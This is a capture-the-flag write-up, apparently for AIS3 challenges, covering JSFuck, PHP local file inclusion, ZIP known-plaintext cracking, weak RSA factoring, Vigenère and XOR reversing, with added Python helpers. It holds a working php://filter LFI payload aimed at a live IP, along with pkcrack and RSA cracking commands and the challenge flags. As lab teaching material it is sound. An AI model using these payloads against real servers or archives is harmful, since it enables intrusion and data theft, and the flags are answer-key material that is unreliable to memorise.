JSFuck

Keynote:

  • A JavaScript program can be written using only the six characters []()!+

Reference:

  • http://www.jingwentian.com/t-413
  • http://codegolf.stackexchange.com/questions/28714/convert-jsfuck-to-normal-js

At first glance the code looked like JavaScript, so I tried running it:

<!-- test.html -->
<html>
<head></head>
<body>
<script>
{ web2.txt }
</script>
</body>
</html>

The result was a ^_^, which confirms it is executable JavaScript

^_^

Searching online led to JSFuck; using a script written by someone else, the JSFuck is converted back into ordinary JavaScript

<!-- jsfuck-decoder.html -->
<html>
<head></head>
<body>
<script>
alert(/\n(.+)/.exec(eval(prompt().slice(0,-2)))[1]);
</script>
</body>
</html>

Output:

[image: jsfuck_in-ais3's_web_question]

Local File Inclusion (LFI) vulnerability

Keynote:

  • php:// — Accessing various I/O streams

Reference:

  • http://security.stackexchange.com/questions/90724/reading-php-comments-using-php-page-that-open-text-files-ctf
  • https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

Tools:

  • Base64 Online Decode https://www.base64decode.org/

Browsing http://52.69.163.194/web1/?page=about shows that the content is included from about.php

http://52.69.163.194/web1/about.php

Supplying a relative path to read a file does not work; PHP errors out and prints nothing

http://52.69.163.194/web1/?page=../web1/about

Reading /etc/passwd does not work either

http://52.69.163.194/web1/?page=/etc/passwd

Including a remote file also fails; allow_url_include is probably not enabled

http://52.69.163.194/web1/?page=http://somewhere/hackfile.php

The working approach is the php://filter wrapper: it forces PHP to base64-encode the file before including it, so the page dumps a long base64 string; decoding that string reveals the PHP source, and the flag is hidden inside

http://52.69.163.194/web1/?page=php://filter/convert.base64-encode/resource=index

PGEgaHJlZj0nP3BhZ2U9YWJvdXQnPiBhYm91dCA8L2E+IDxiciAvPgo8YSBocmVmPSc/cGFnZT10ZXN0Jz4gdGVzdCA8L2E+IDxiciAvPgo8YnI+Cjxicj4KPD9waHAKCiAgICAgICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOwoKICAgICAgICAkcGFnZSA9ICRwYWdlIC4gJy5waHAnOwogICAgICAgICRwYWdlID0gc3RyX3JlcGxhY2UoIi4uLyIsICIiLCAkcGFnZSk7CiAgICAgICAgaW5jbHVkZSggJHBhZ2UgKTsKCiAgICAgICAgLy8gdGhlIGtleSBpcyBBSVMze3BocF93cmFwcGVyX3JvY2tzfQ==

Decoded:

<a href='?page=about'> about </a> <br />
<a href='?page=test'> test </a> <br />
<br>
<br>
<?php

        $page = $_GET['page'];

        $page = $page . '.php';
        $page = str_replace("../", "", $page);
        include( $page );

        // the key is AIS3{php_wrapper_rocks}
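The decoded source shows why the wrapper worked: the only filter is a single non-recursive `str_replace("../", "")`, and a `php://` scheme contains no `../` at all, so it reaches `include()` untouched. The following is an added example, not code from the challenge: the naive filter is re-implemented in Python next to an allowlist-based resolver, so the two can be compared on the same inputs. The page names `about` and `test` are taken from the decoded index page; `base_dir` and the `.php` suffix handling are assumptions.

```python
"""Naive page filter versus allowlist resolver (added example, not the challenge's PHP)."""
import os
from typing import Optional

# Pages the application actually offers (assumption: only the two linked from index).
ALLOWED_PAGES = {"about", "test"}


def naive_resolve(page: str) -> str:
    """Mirror the vulnerable PHP: append '.php' and strip '../' once.

    Anything that is not literally '../' (a php:// wrapper, an absolute path)
    survives unchanged and is handed to include().
    """
    path = page + ".php"
    return path.replace("../", "")


def safe_resolve(page: str, base_dir: str) -> Optional[str]:
    """Return the file to include, or None if the request is not an allowed page.

    Two independent checks: the name must be on the allowlist, and the resolved
    path must stay inside base_dir. A wrapper scheme such as php://filter never
    reaches the filesystem because it fails the allowlist.
    """
    if page not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    for req in ("about", "../web1/about",
                "php://filter/convert.base64-encode/resource=index"):
        print(f"{req!r:55} naive -> {naive_resolve(req)!r}")
        print(f"{'':55} safe  -> {safe_resolve(req, '/srv/web1')!r}")
```

Run it and the wrapper request comes out of `naive_resolve` with only `.php` appended, exactly what the server received, while `safe_resolve` returns `None` for it and for the traversal attempt, and a path under `base_dir` only for the two real pages.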

Buffer Overflow Attack

Keynote:

  • stack

Tools:

  • pwntool

sub_4006AD:

[image: pwn1_asm_in_ais3's_binary_question]

[image: pwn1_boa_in_ais3's_pwn3d_question]

stack ??

-----ret-----
4
----var_4----
16
----var_20---
4
-----rbp-----
20
-----rsp-----

File extension

Keynote:

  • gzip, tar, bmp

Tools:

  • stegsolve.jar: A steganographic image analyzer, solver and data extractor for challenges.

Check the type of the file c4

$ file c4

c4: gzip compressed data, from Unix

Rename c4 to c4.gz

$ gzip -d c4

gzip: c4: unknown suffix -- ignored

$ mv c4 c4.gz
$ gzip -d c4.gz

Decompressing yields a tar archive, also named c4, which itself contains a file named c4; to avoid overwriting, rename it before extracting

$ tar -zxvf c4

x c4: Refusing to overwrite archive
tar: Error exit delayed from previous errors.

$ tar -tvf c4
-rw-rw-r--  0 orange orange 345654 Jul 21 18:02 c4

$ mv c4 c4.tar
$ tar -zxvf c4.tar

x c4

$ file c4

c4: PC bitmap, Windows 3.x format, 480 x 240 x 24

c4 is now a BMP image, and text is faintly visible in the lower-left corner

[image: c4_bmp_in_ais3's_misc_question]

Processing the image with stegsolve.jar, the text becomes clearly readable in the Red plane 2 mode

[image: c4_solved_bmp_in_ais3's_misc_question]
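The same gzip → tar → BMP peeling can be done from file signatures alone, without trusting the extension and without the same-name overwrite problem, because each layer is unwrapped in memory. The following is an added example, not the page's shell session: `sniff` checks the magic bytes that `file` reported (gzip `1f 8b`, the `ustar` marker at offset 257 of a tar header, `BM` for a bitmap), `peel` unwraps until it reaches a leaf, and `bmp_info` reads the 480 × 240 × 24 geometry from the BITMAPINFOHEADER. The sample archive is constructed inside the block (a header-only BMP wrapped in a tar inside a gzip) so the block runs offline.

```python
"""Peel nested gzip/tar layers by magic bytes (added example, constructed sample data)."""
import gzip
import io
import struct
import tarfile


def sniff(data: bytes) -> str:
    """Coarse type from the file signature, the way `file` decides."""
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if data[:2] == b"BM":
        return "bmp"
    if len(data) > 262 and data[257:262] == b"ustar":
        return "tar"
    return "unknown"


def bmp_info(data: bytes):
    """(width, height, bits per pixel) from a BITMAPINFOHEADER; fields are little-endian."""
    width, height = struct.unpack_from("<ii", data, 18)
    bpp = struct.unpack_from("<H", data, 28)[0]
    return width, abs(height), bpp


def peel(data: bytes, max_layers: int = 10):
    """Unwrap gzip and tar layers in memory until a leaf type is reached.

    Returns (list of layer types, leaf bytes). Nested members may all share the
    same name; working in memory avoids tar's 'Refusing to overwrite archive'.
    """
    layers = []
    for _ in range(max_layers):
        kind = sniff(data)
        layers.append(kind)
        if kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(data)) as tar:
                member = next(m for m in tar.getmembers() if m.isfile())
                data = tar.extractfile(member).read()
        else:
            break
    return layers, data


def build_sample() -> bytes:
    """Constructed sample: header-only 480x240x24 BMP, tarred as 'c4', then gzipped."""
    dib = struct.pack("<IiiHHIIiiII", 40, 480, 240, 1, 24, 0, 0, 2835, 2835, 0, 0)
    bmp = b"BM" + struct.pack("<IHHI", 14 + len(dib), 0, 0, 14 + len(dib)) + dib
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name="c4")
        info.size = len(bmp)
        tar.addfile(info, io.BytesIO(bmp))
    return gzip.compress(buf.getvalue())


if __name__ == "__main__":
    layers, leaf = peel(build_sample())
    print("layers:", " -> ".join(layers))
    print("bitmap: %d x %d x %d" % bmp_info(leaf))
```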

Known-plaintext attack

Keynote:

  • cracking ZIP Files
  • you need to have one of the original files contained in the encrypted archive

Reference:

  • https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files

Tools:

  • pkcrack

First confirm that facebook.zip is a zip file

$ file facebook.zip

facebook.zip: Zip archive data, at least v1.0 to extract

Opening it shows that it is encrypted; list the files inside the archive

$ unzip -l facebook.zip

Archive:  facebook.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
       38  07-15-15 18:15   key.txt
        0  07-15-15 18:13   p960x960/
    26664  10-30-13 08:19   p960x960/851556_443281069111871_602278786_n.png
 --------                   -------
    26702                   3 files

From the online tutorial:

you need to have one of the original files contained in the encrypted archive. What you are going to do with it is you are going to compress it using the same compression method as the protected file. Remember this, otherwise it won’t work. So after you do that, move both your zip files, the encrypted one and the plaintext zip

Search Google for 851556_443281069111871_602278786_n.png

[image: 851556_443281069111871_602278786_n.png]

Compress that file (with its full path)

$ zip -r plaintext.zip p960x960/851556_443281069111871_602278786_n.png
$ unzip -l plaintext.zip

Archive:  plaintext.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
    26664  07-25-15 00:09   p960x960/851556_443281069111871_602278786_n.png
 --------                   -------
    26664                   1 file

Run pkcrack

pkcrack -C facebook.zip -c "p960x960/851556_443281069111871_602278786_n.png" -P plaintext.zip -p "p960x960/851556_443281069111871_602278786_n.png" -d decrypted.zip -a

Extract decrypted.zip; key.txt inside holds the flag
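The tutorial's condition (the same file, compressed with the same method) can be verified before running pkcrack, because a ZIP central directory stores each member's CRC-32, uncompressed size and compression method in the clear even when the data is encrypted. The following is an added example, not part of pkcrack: it compares those three fields for a candidate plaintext against the archive member. The sample archive and the stand-in file content are constructed in the block (Python's `zipfile` cannot write encrypted archives, but the directory fields checked here are the same in an encrypted one); the member name mirrors the page's path layout.

```python
"""Verify a known-plaintext candidate against a zip member (added example, constructed data)."""
import io
import zipfile
import zlib

DEFLATED = zipfile.ZIP_DEFLATED
STORED = zipfile.ZIP_STORED

# Constructed stand-in for the image file; any bytes will do for the check.
SAMPLE_PNG = b"\x89PNG constructed stand-in, not a real image\n" * 100


def member_fingerprint(zip_bytes: bytes, name: str):
    """CRC-32, uncompressed size and compression method of one member.

    These come from the central directory and need no password.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        info = zf.getinfo(name)
        return info.CRC, info.file_size, info.compress_type


def candidate_matches(zip_bytes: bytes, name: str, candidate: bytes, method: int) -> bool:
    """True if `candidate`, compressed with `method`, is the member `name`.

    CRC-32 and size are computed over the plaintext, so a wrong or re-encoded
    copy of the file fails here long before any cracking starts.
    """
    crc, size, comp = member_fingerprint(zip_bytes, name)
    return crc == zlib.crc32(candidate) and size == len(candidate) and comp == method


def build_zip(name: str, content: bytes, method: int) -> bytes:
    """Constructed sample archive with a single member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=method) as zf:
        zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    name = "p960x960/sample.png"
    archive = build_zip(name, SAMPLE_PNG, DEFLATED)
    print("same file, deflated :", candidate_matches(archive, name, SAMPLE_PNG, DEFLATED))
    print("modified file       :", candidate_matches(archive, name, SAMPLE_PNG + b"x", DEFLATED))
    print("wrong method        :", candidate_matches(archive, name, SAMPLE_PNG, STORED))
```

In practice the two archives' `unzip -l` listings already show size and date, but the CRC comparison is the decisive one: a PNG that was re-saved or re-downloaded at a different size will have the same name and nearly the same size yet a different CRC.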

RSA Cracking

Keynote:

  • a 768 bit RSA crack when all you have is the file you want to decrypt, and the public key

Reference:

  • http://m0x39.blogspot.tw/2012/12/0x00-introduction-this-post-is-going-to.html
  • http://blog.orange.tw/2014/10/hack-in-box-2014-ctf-writeup-keygenme.html

Tools:

  • rsatool.py: https://github.com/ius/rsatool.git
  • Factordb: http://www.factordb.com
  • rsacrack.py: usage: cat file | python rsacrack.py -d [private key exponent] [public key modulus]
  • p = randomly chosen prime
  • q = randomly chosen prime
  • n = modulus for public and private keys(n=pq)
  • f(n)=(p-1)(q-1) :: f(n) counts the number of positive integers less than or equal to n that are relatively prime to n
  • e = exponent (chosen as 1 < e < f(n) && greatest common divisor of (e, f(n)) = 1… so e and f(n) are coprime) this is the public key exponent
  • d = e^-1(mod f(n)) or (de) = 1 mod f(n) — this is the private key exponent

rsa.py already contains the public key's n and e; use Factordb to find the two large primes p and q

Use rsatool.py to obtain the private key's n and d

$ python rsatool.py -p 800644567978575682363895000391634967 -q 83024947846700869393771322159348359271173 -n 66473473500165594946611690873482355823120606837537154371392262259669981906291 -e 65537
Using (p, q) to initialise RSA instance

n =
92f6a717a4ca87fbb4e008b2ba036d8fc5ca22c8bb61060fef170ce6792ec573

e = 65537 (0x10001)

d =
480c35d4888c65e8073f81e424ff42c28879294c3c4954a295bf3880decf0659

p = 800644567978575682363895000391634967 (0x9a32d32db1c5be9aeac5de0daa5017)

q =
f3fd0751a4697130a74c96ce57bad29305

P.S. q = 83024947846700869393771322159348359271173 (0xf3fd0751a4697130a74c96ce57bad29305)

Use rsacrack.py

$ cat flag.enc | python rsacrack.py -d 480c35d4888c65e8073f81e424ff42c28879294c3c4954a295bf3880decf0659 92f6a717a4ca87fbb4e008b2ba036d8fc5ca22c8bb61060fef170ce6792ec573 | strings
AIS3{rsaaaaaaaaA_orz}

P.S.

n = 0x92f6a717a4ca87fbb4e008b2ba036d8fc5ca22c8bb61060fef170ce6792ec573 = 66473473500165594946611690873482355823120606837537154371392262259669981906291
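The definitions listed under Tools are all that rsatool.py and rsacrack.py do: n = pq, φ(n) = (p−1)(q−1), d = e⁻¹ mod φ(n), and then m = c^d mod n on the ciphertext file read as one big-endian integer. The following is an added example that carries those formulas through in Python (it is neither rsatool.py nor rsacrack.py). The page's p, q and e are embedded as-is for the stand-alone run; the textbook pair p = 61, q = 53, e = 17 is a small constructed check whose values can be verified by hand.

```python
"""RSA private key from factors and raw decryption (added example, not rsatool/rsacrack)."""
from math import gcd

# Values from the page: the public exponent and the factors Factordb reported.
PAGE_P = 800644567978575682363895000391634967
PAGE_Q = 83024947846700869393771322159348359271173
PAGE_E = 65537


def private_from_factors(p: int, q: int, e: int):
    """Return (n, phi, d) for n = p*q, phi = (p-1)(q-1), d = e^-1 mod phi.

    Raises ValueError when e and phi are not coprime, in which case no d exists.
    """
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return n, phi, d


def encrypt(m: int, e: int, n: int) -> int:
    """Textbook RSA: c = m^e mod n (no padding, exactly as the challenge file was made)."""
    return pow(m, e, n)


def decrypt_to_bytes(c: int, d: int, n: int) -> bytes:
    """m = c^d mod n, rendered big-endian, which is what `| strings` then reads."""
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def decrypt_file_bytes(cipher: bytes, d: int, n: int) -> bytes:
    """Treat a raw ciphertext file (like flag.enc) as one big-endian integer."""
    return decrypt_to_bytes(int.from_bytes(cipher, "big"), d, n)


if __name__ == "__main__":
    n, phi, d = private_from_factors(PAGE_P, PAGE_Q, PAGE_E)
    print(f"n = {n:x}")
    print(f"d = {d:x}")
    print("d*e == 1 mod phi:", (d * PAGE_E) % phi == 1)
```

Run it and compare the printed n with the modulus in rsa.py; if they differ, Factordb returned factors of a different number and nothing downstream will work, which is the first thing to check when `| strings` shows garbage.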

Vigenère cipher

Keynote:

  • filename

Reference:

  • https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher

Tools:

  • Vigenere Cipher Decoder http://www.dcode.fr/vigenere-cipher
  • Vigenère Cipher Codebreaker http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx

Use the first link to find the likely key length, then with the second link set that key size to enumerate all candidate decryptions and search for "the key is" to find the readable string

[image: vigenere_key_length_in_ais3's_crypto_question]

[image: vigenere_decode_in_ais3's_crypto_question]
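Searching the candidate decryptions for "the key is" is a crib: once the key length is known, sliding a crib over the ciphertext and subtracting it yields the key letters at those positions, and any position where the implied keystream is not periodic with that length can be discarded. The following is an added example (not the online tools the page used): a Vigenère encrypt/decrypt routine plus `recover_keys`, which returns every key consistent with the crib at some position. The plaintext and key ORANGE are constructed here; with a crib at least as long as the key, one position determines the whole key.

```python
"""Vigenère cipher and crib-based key recovery (added example, constructed sample text)."""
import string

A = string.ascii_uppercase

# Constructed sample; the phrase the page searched for is embedded in it.
SAMPLE_PLAINTEXT = ("The answer to this challenge is short and simple "
                    "the key is orange and nothing else matters here")
SAMPLE_KEY = "ORANGE"


def clean(text: str) -> str:
    """Keep letters only, upper-cased, as classical Vigenère does."""
    return "".join(ch for ch in text.upper() if ch in A)


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift each letter by the matching key letter (subtract when decrypting)."""
    key = clean(key)
    out = []
    for i, ch in enumerate(clean(text)):
        k = A.index(key[i % len(key)])
        out.append(A[(A.index(ch) + (-k if decrypt else k)) % 26])
    return "".join(out)


def keystream_fragment(cipher: str, crib: str, pos: int) -> str:
    """Key letters that would map `crib` onto cipher[pos:pos+len(crib)]."""
    return "".join(A[(A.index(c) - A.index(p)) % 26]
                   for c, p in zip(cipher[pos:pos + len(crib)], crib))


def recover_keys(cipher: str, crib: str, key_len: int):
    """Slide the crib over the ciphertext; keep positions whose implied keystream is
    periodic with key_len and return the keys they imply (rotated to offset 0).
    Requires len(crib) >= key_len so that one position fixes every key letter."""
    crib = clean(crib)
    if len(crib) < key_len:
        raise ValueError("crib shorter than key length")
    keys = set()
    for pos in range(len(cipher) - len(crib) + 1):
        frag = keystream_fragment(cipher, crib, pos)
        if all(frag[j] == frag[j + key_len] for j in range(len(frag) - key_len)):
            # frag[j] is key[(pos + j) % key_len]; undo that rotation
            keys.add("".join(frag[(i - pos) % key_len] for i in range(key_len)))
    return keys


if __name__ == "__main__":
    ct = vigenere(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    print("ciphertext:", ct)
    for key in sorted(recover_keys(ct, "the key is", len(SAMPLE_KEY))):
        print(key, "->", vigenere(ct, key, decrypt=True)[:40])
```

The true key is always among the results; spurious candidates produced by chance periodicity at other positions are eliminated by eye, exactly as the page did with the tool's list, or by checking which decryption is readable.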

64bit assembly code

Keynote:

  • little endian
  • xor

Tools:

  • ida64
  • XOR Calculator online https://xor.pw/
  • Hex to ASCII text converter http://www.rapidtables.com/convert/number/hex-to-ascii.htm

Mainly examine the check1, check2 and gg functions

check1:

[image: stupid_v2_check1_func_in_ais3's_binary_question]

check2:

[image: stupid_v2_check2_func_in_ais3's_binary_question]

gg:

[image: stupid_v2_gg_func_in_ais3's_binary_question]

In check1, the to_reg function stores the input into rdx; the key constant is 0DDDDAAAADADADDAAh, and the computation is:

key = (input) XOR 0DDDDAAAADADADDAAh

In check2, gg is called, and when ax = 0 the correct branch is reached: “Yeah, It’s a flag !!! …”

Inside gg the key is checked in two halves; in short, the key must be the concatenation of 0BFB7B8CEh and 0BCB4DEC4h

key = (input) XOR 0DDDDAAAADADADDAAh
    = 0BCB4DEC4BFB7B8CEh

So the input value is 06169746e656d6564h; convert it to ASCII and, because of little endian, read it in reverse:

dementia

You get a case of dementia :)

flag: AIS3{dementia}

Shellcode to bin

Keynote:

  • shellcode
  • xor

Reference:

  • http://theloshackers.blogspot.tw/2013/08/convert-hex-shellcode-to-binary-mode.html

Tools:

  • ida64
  • XOR Calculator online https://xor.pw/
  • Hex to ASCII text converter http://www.rapidtables.com/convert/number/hex-to-ascii.htm

Write the shellcode out as a binary

$ echo -ne "{ shellcode }" > sc.bin

Then load it into IDA and find this fragment

[image: sc_shellcode_to_bin_in_ais3's_binary_question]

There are 40 characters on the stack in total; they are read one at a time via [rsi+rdx] and XORed with 0CCh until dl reaches 37 (25h), i.e. the 37th character

# original

414141C6B1B9A3B5
93BEA3AA93A8A0BC
A1A5BF93BFA593A9
A8A3AFA0A0A9A4BF
93A7A3B7FF9F858D

# after XOR
# [ ] : ignored

[    ]0a7d756f79
5f726f665f646c70
6d69735f73695f65
646f636c6c656873
5f6b6f7b33534941

On a little-endian system, read it in reverse and convert the hex to ASCII to see the flag

[image: sc_converted_hex_to_ascii_in_ais3's_binary_question]
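Both the check1/gg puzzle and the shellcode puzzle reduce to the same two steps: undo an XOR, then read the bytes in memory order rather than register order. The following is an added example (not the page's online calculators) that does both in code. The constants 0DDDDAAAADADADDAAh and 0BCB4DEC4BFB7B8CEh and the 40 stack bytes are copied from the page; the AIS3{...} regex used to pick the flag out of the decoded bytes is an assumption about the flag format, taken from the other flags on this page.

```python
"""XOR decoding with little-endian byte order (added example; constants from the page)."""
import re

# check1 computes key = input XOR mask; gg accepts only key == EXPECTED_KEY
XOR_MASK = 0xDDDDAAAADADADDAA
EXPECTED_KEY = 0xBCB4DEC4BFB7B8CE

# Shellcode challenge: 40 bytes on the stack, each XORed with 0CCh
SHELLCODE_STACK = bytes.fromhex(
    "414141C6B1B9A3B5" "93BEA3AA93A8A0BC" "A1A5BF93BFA593A9"
    "A8A3AFA0A0A9A4BF" "93A7A3B7FF9F858D"
)


def solve_xor64(expected: int, mask: int) -> bytes:
    """XOR is its own inverse: input = expected ^ mask. Rendering the 64-bit value
    little-endian gives the characters in the order they sat in memory before
    being loaded into rdx, which is why the hex reads backwards in IDA."""
    return (expected ^ mask).to_bytes(8, "little")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Byte-wise XOR with a single-byte key (what the [rsi+rdx] loop does)."""
    return bytes(b ^ key for b in data)


def decode_stack_string(stack: bytes, key: int = 0xCC) -> str:
    """XOR every byte, then reverse the whole buffer: the qwords were pushed in
    reverse order and each is little-endian, so the dump reads back to front."""
    return xor_bytes(stack, key)[::-1].decode("latin-1")


def find_flag(text: str):
    """Pick out an AIS3{...} token (assumed flag format); the 'AAA' padding and the
    trailing newline fall outside the match and are ignored."""
    m = re.search(r"AIS3\{[^}]*\}", text)
    return m.group(0) if m else None


if __name__ == "__main__":
    print("input value :", hex(EXPECTED_KEY ^ XOR_MASK))
    print("as LE bytes :", solve_xor64(EXPECTED_KEY, XOR_MASK))
    print("after xor   :", xor_bytes(SHELLCODE_STACK, 0xCC).hex())
    print("flag        :", find_flag(decode_stack_string(SHELLCODE_STACK)))
```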

Strings

Keynote:

  • dynamic analysis

Tools:

  • ollyDbg201h

Load bin1.exe into OllyDbg and search for the string ‘AIS3’ to find the flag

[image: bin1_exe_strings_in_ais3's_binary_question]

A few characters are missing, but they can be filled in from the meaning of the flag

P.S.

The strings view in ollyDbg110 is less complete than in ollyDbg201h

ollyDbg201h's strings view still drops characters; the reason is unclear
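When a debugger's string view drops characters, a second, independent extraction over the raw file is the quickest cross-check. The following is an added example, not OllyDbg: a small `strings`-style scanner that reports printable ASCII runs and also UTF-16LE runs (the form Windows binaries often store text in, which an ASCII-only scan shows as single letters separated by gaps). The buffer it scans is constructed in the block; the `AIS3` search mirrors what the page did in OllyDbg.

```python
"""Minimal strings extractor for ASCII and UTF-16LE runs (added example, constructed data)."""
import re

# Constructed stand-in for a PE file: a fake MZ header, padding, one ASCII string,
# one UTF-16LE string, some noise and a run too short to report.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"AIS3{constructed_ascii}" + b"\x00" * 7
    + "AIS3{constructed_wide}".encode("utf-16-le")
    + b"\xff" * 5 + b"ab\x00"
)


def strings(data: bytes, min_len: int = 4):
    """Return (offset, encoding, text) for every printable run of at least min_len chars."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    # UTF-16LE: each printable ASCII code unit is followed by a zero byte
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(found)


def grep_strings(data: bytes, needle: str, min_len: int = 4):
    """Only the runs containing `needle`, e.g. a flag prefix."""
    return [s for s in strings(data, min_len) if needle in s[2]]


if __name__ == "__main__":
    for offset, enc, text in grep_strings(SAMPLE_BINARY, "AIS3"):
        print(f"{offset:#06x} {enc:9} {text}")
```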